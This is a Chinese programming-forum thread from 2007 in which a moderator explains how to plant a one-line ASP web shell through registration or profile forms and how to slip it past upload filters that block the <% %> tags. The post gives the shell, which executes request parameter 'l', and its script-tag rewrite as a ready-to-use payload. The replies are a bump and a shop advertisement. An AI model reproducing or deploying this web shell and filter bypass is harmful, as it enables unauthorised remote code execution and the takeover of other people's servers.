| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 674 人关注过本帖
标题:一句话木马中突破〈%%〉标记过滤
只看楼主 加入收藏
SUNZN
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
等 级:版主
威 望:3
帖 子:132
专家分:7
注 册:2007-3-19
收藏
 问题点数:0 回复次数:2 
一句话木马中突破〈%%〉标记过滤

一句话木马中突破〈%%〉标记过滤

很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是“ <%execute request("l")%> ", 我们可以把它的标签换下来。然后改成" <scriptlanguage=VBScript runat=server>execute request("l")</Script> ".。这样就避开了使用〈%%〉,保存为.ASP,程序照样执行,效果是一样的。


[此贴子已经被作者于2007-11-7 13:27:21编辑过]

搜索更多相关主题的帖子: 木马中 数据库 服务器 ASP 
2007-10-13 18:19
lthiy
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
等 级:版主
威 望:9
帖 子:849
专家分:0
注 册:2007-4-4
收藏
得分:0 
我来帮你顶一下

2007-11-04 10:21
hanzhu3366
Rank: 1
来 自:湖北武汉
等 级:新手上路
帖 子:741
专家分:3
注 册:2007-10-12
收藏
得分:0 
恩博客做的不错~~

偶滴淘宝小店,主要经营女装、男装、话费充值哦http://hanzhu3366.taobao. com
2007-11-06 11:38
快速回复:一句话木马中突破〈%%〉标记过滤
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.016006 second(s), 9 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved